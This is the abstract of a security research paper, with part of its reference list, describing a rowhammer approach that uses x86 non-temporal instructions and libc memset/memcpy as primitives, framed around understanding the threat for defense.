Rowhammer is a hardware bug identified in recent commodity DRAMs: repeated row activations can cause bit flips in adjacent rows. Rowhammer has been recognized as both a reliability and security issue. And it is a classic example that layered abstractions and trust (in this case, virtual memory) can be broken from hardware level. Previous rowhammer attacks either rely on rarely used special instructions or complicated memory access patterns. In this paper, we propose a new approach for rowhammer that is based on x86 non-temporal instructions. This approach bypasses existing rowhammer defense and is much less constrained for a more challenging task: remote rowhammer attacks, i.e., triggering rowhammer with existing, benign code. Moreover, we extend our approach and identify libc memset and memcpy functions as a new rowhammer primitive. Our discussions on rowhammer protection suggest that it is critical to understand this new threat to be able to defend in depth.
[1]
Chris Fallin,et al.
Flipping bits in memory without accessing them: An experimental study of DRAM disturbance errors
,
2014,
2014 ACM/IEEE 41st International Symposium on Computer Architecture (ISCA).
[2]
Neha Narula,et al.
Native Client: A Sandbox for Portable, Untrusted x86 Native Code
,
2009,
IEEE Symposium on Security and Privacy.
[3]
Reetuparna Das,et al.
ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks
,
2016
.
[4]
Stefan Mangard,et al.
Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript
,
2015,
DIMVA.